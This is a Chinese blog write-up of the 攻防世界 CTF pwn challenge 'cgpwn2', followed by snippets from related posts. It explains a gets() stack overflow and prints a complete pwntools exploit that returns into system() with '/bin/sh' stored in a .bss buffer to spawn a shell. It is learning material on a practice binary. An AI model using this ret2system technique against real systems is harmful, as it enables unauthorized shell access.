攻防世界 Pwn cgpwn2

最新推荐文章于 2023-10-31 16:35:53 发布
原创 最新推荐文章于 2023-10-31 16:35:53 发布 · 713 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

攻防世界 Pwn cgpwn2

1.题目下载地址

点击下载

2.checksec分析

在这里插入图片描述
只开启了NX保护,应该不会有太多障碍
直接进IDA看一下

3.IDA分析

main函数中有一个hello函数,我们直接看hello函数
在这里插入图片描述

  • 可以看到第二个gets函数没有限制输入大小,很明显是栈溢出
  • 再看看有没有其他后门函数
    在这里插入图片描述
    看到有一个pwn函数中调用了system
    在这里插入图片描述
    而且第一个gets函数输入的name正好是处于bss段
    那么我们可以写命令到name
    然后找到这个地址,利用简单ROP

3.1.看一下溢出大小

老规矩还是cyclic
在这里插入图片描述
然后找到sys地址
在这里插入图片描述
接下来就是构造payload了

4.exp

from pwn import *
r = process('./cgpwn2')
#r = remote('111.198.29.45',51186)
target = 0x804855A

binsh = 0x804A080

payload = 'a' * 42 + p32(target) + p32(binsh)

a = r.recvuntil('e\n')
r.sendline('/bin/sh')
a = r.recvuntil(':\n')
r.sendline(payload)
r.interactive()

4.1.运行结果

在这里插入图片描述
可以看到已经顺利拿到本机权限了

攻防世界 cgpwn2
weixin_73399382的博客
07-12 1247
看到这fgets读取我们的输入到name中,因为程序没留shell,我们可以直接传入/bin/sh这个系统的默认shell,又因为下面使用gets从s中读取,我们可以使用让s溢出返回我们在name里面传入的默认/bin/sh。下面这个是利用plt查找system在got表中的地址,以后程序开启地址随机化的话函数的地址是变化的,就需要这么来找。s的内存空间+0处start到s需0x26字符,r是偏移指针到start处需0x4字符。system函数的地址我们刚才已经找到了,可以直接写脚本了。
攻防世界-cgpwn2
qq_45771413的博客
04-23 346
查看保护 无栈保护,无PIE保护 IDA 两次输入,一个输入名字(限制了输入长度),一个输入信息(gets可以作栈溢出) 解题思路 shift+f12查找字符串并没有发现/bin/sh,可能需要自己整,或者藏在某个变量里 在找_system函数的过程中,发现了pwn命名的函数,进入发现有system调用,第一次做的时候看到system就乐了,直接溢出s,然后跳转到pwn地址,结果真就只有 hehehe …… 估计这是出题人的恶趣味…… 后来我在函数列表里找到了真正的_system,括号内的comma
攻防世界pwn——cgpwn2
qq_62076255的博客
11-05 502
攻防世界pwn——cgpwn2
[攻防世界]cgpwn2
逆向萌新的博客
06-11 503
[攻防世界]cgpw2n
攻防世界_pwn_cgpwn2(萌新版)
TedLau的博客
02-24 442
首发于鄙人博客:传送门 0x00 前言 省略file checksec,此两步大家都能够实现。 0x10 步骤 0x10 hello函数 为32位文件,用32位ida打开后,可以发现如下hello函数 在hello函数中我们可以发现,他让我们输入两块内容,一个是name,一个是some message。 0x11 _system函数 而在左侧的函数栏中,我们可...
攻防世界pwn cgpwn2
最新发布
03-08
### 攻防世界 PWN CGPWN2 挑战解题思路 #### 题目分析 CGPWN2 是一个典型的缓冲区溢出漏洞利用题目。通过 `checksec` 工具检测得知该程序是一个32位的小端序可执行文件,启用了部分安全机制如 RELRO 和 NX,但未...
攻防世界pwn-cgpwn2
a_silly_coder的博客
01-15 1578
下载文件后,首先检查保护: 随后将文件拖入ida,查看源码,在hello函数中,发现了如下代码 首先用安全的fgets输入了一个变量,接着用不安全的gets接收了一个变量,在此处可以确认是栈溢出,且溢出点就在此处。 开始寻找利用方式,发现了system函数 还缺一个"/bin/sh"字符串,找遍了代码,没有发现,但是由于此前可以有一个自己的输入,保存在name变量上,即可以自己手动输入"/bin/sh",自此,设计栈结构为: 开始编写脚本: from pwn imp...
攻防世界PWN新手练习区——cgpwn2
smsyz2019的博客
09-23 443
攻防世界PWN新手练习区——cgpwn2 首先检查文件的有哪些保护 checksec cgpwn2 32位程序 用IDA反编译文件 main函数中只有hello函数,点击查看
攻防世界 when_did_you_born
09-28 324
1.题目 2.IDA反汇编C程序 3.程序流程分析 首先输入Birth,如果Birth==1926直接退出;否则,输入Name,这时,判断Birth是否==1926.等于则get flag。 很明显,输入名字就是专门为我们提供溢出点的。两个变量的位置如下图: 0x20 - 0x18 = 0x8 也就是说name和birth之间间距8个单元。exp如下 from pwn import * #io = process('./when_did_you_born') io = remo
攻防世界pwn新手练习(cgpwn2
BurYiA的博客
03-26 615
题目链接 分析 我们来看这道题,首先checksec并运行一下 可以看到是32位程序,有两个输入点,保护只有 NX。 接下来我们在ida中看看分析。在hello函数的最后我们可以看到这些东西 这就是程序给我们的两个输入点,可以看到第二个是 gets ,那就很方便了,直接溢出利用就行,翻看其他函数我们可以发现有一个system函数 很遗憾的是只有system函数而没有我们需要的shellco...
攻防世界 - pwn - cgpwn2
qq726232111的博客
03-16 312
A、流程分析 1、将输入的用户名存储到全局变量 2、通过gets()获取留言信息 B、利用分析 1、gets( ebp-26h ) -> 26h(填充数据) + 4(ebp) + 4(返回地址) -> payload构造 2、可利用函数 在pwn函数有system函数,可通过该地址调用系统命令 3、用户名使用的全局变...
攻防世界PWN-cgpwn2
Deeeelete的博客
11-14 551
题目:cgpwn2 拖进PE查看一下 32位程序 checksec查看 简单执行一下 开32位IDA f5反编译main函数 main函数中直接就是输出了,输入的内容好像藏在了hello方法里 双击进去查看 单独拿出源码 char *hello() { char *v0; // eax@1 signed int v1; // ebx@1 unsigned int v2; // ecx@3 char *v3; // eax@5 char s; // [sp+12
攻防世界: cgpwn2
qq_41071646的博客
01-02 4466
这个题 也是新手入手的题 比较简单   怎么说呢 就是一个简单的构造罢了 点进hello  然后发现  然后我们点进name   发现 name 地址是固定的 我们可以将这个写入 bin/sh 就可以了 然后看 system列表    这里可以看的出来  是有42个 字符  就可以 返回我们gets 的返回地址  然后  我们 只需要 讲system 搞进去 然后输入...
攻防世界pwn[cgpwn2]
SUOYE_GUANXING的博客
10-31 228
将 "/bin/sh" 写入name, 用gets函数进行栈溢出, system为返回值, name为system的参数。flag为:cyberpeace{b232df4322e677518de6a61097130634}下载文件,先check一下;这里需要0x26+0x4才能到我们的返回地址;发现system,但没有/bin/sh;跟进name发现它是一个静态地址;学的还是有点迷,但慢慢来嘛~32位的ida打开;进入hello函数;
攻防世界cgpwn2
zyh18851473527的博客
08-05 983
首先checksec,之后放入IDA中 点进hello 发现gets()函数可能会存在栈溢出,然后我们点进name 发现 name 地址是固定的,那我们可以它写入 bin/sh ,接着看能不能找到system 找到啦!所以这个题目的思路是:通过栈溢出漏洞,调用system函数,同时在name中写入"/bin/sh",把参数地址设置为name的首地址,就可以getshell了! gets() ...
攻防世界-pwn新手区-cgpwn2
CHAWUCIREN1的博客
08-11 323
先运行一下 老规矩,checksec 和file pie和canary关了 ida 查看一下 hello函数 name在bss段 有没有发现bin/sh 所以我们可以自己写一个shellcode name_bin_sh = 0804A080 看一下s的栈空间 00000027 db ? ; undefined -00000026 s dw ? -00000024 db ? ; undefined -0000002
pwn学习笔记2cgpwn2攻防世界新手pwn题)
weixin_45927195的博客
03-14 620
改变system函数的参数 先运行,发现可以输入两次。再查看防御机制,开启了NX保护,即堆栈不可执行。 用ida查看主函数,发现只有一个hello()函数。查看其内容,直接找到运行时看到的"please tell me your name"。第一次输入规定了长度,第二次没有规定,存在漏洞: 找到一个后门函数pwn(),存在 call _system语句,但是这个函数的参数"echo heheh...
2019.7.17 功放世界 cgpwn2
DSR446的博客
07-17 408
以下是该题的脚本: # -*- coding:utf-8 -*- from pwn import * elf=ELF('./cgpwn2') p = remote('111.198.29.45',47681) addr=0x804A080 #点击name,获得name的地址。 p.recvline() p.sendline('/bin...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值